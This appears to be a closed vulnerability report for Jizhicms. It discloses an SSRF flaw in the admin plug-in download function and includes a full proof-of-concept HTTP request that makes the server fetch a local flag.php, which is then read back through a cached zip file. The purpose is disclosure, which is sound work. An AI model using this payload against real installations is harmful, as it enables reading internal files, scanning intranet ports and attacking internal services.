Closed
Description
SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks
The vulnerability is located in the background plug-in download function
I start a locally accessible Web service with a flag.php file
use payload
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.48.135
Content-Length: 93
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.48.135
Referer: http://192.168.48.135//admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=821f3d50fa8cd84139c76be9
Connection: close
action=start-download&filepath=mutisite&download_url=http%3a%2f%2f127.0.0.1%3a8888%2fflag.phpSee the response
Browser accesshttp://192.168.48.135/cache/update_mutisite.zip
open by notepad
As with flag.php, this was read successfully
Metadata
Assignees
Labels
No labels




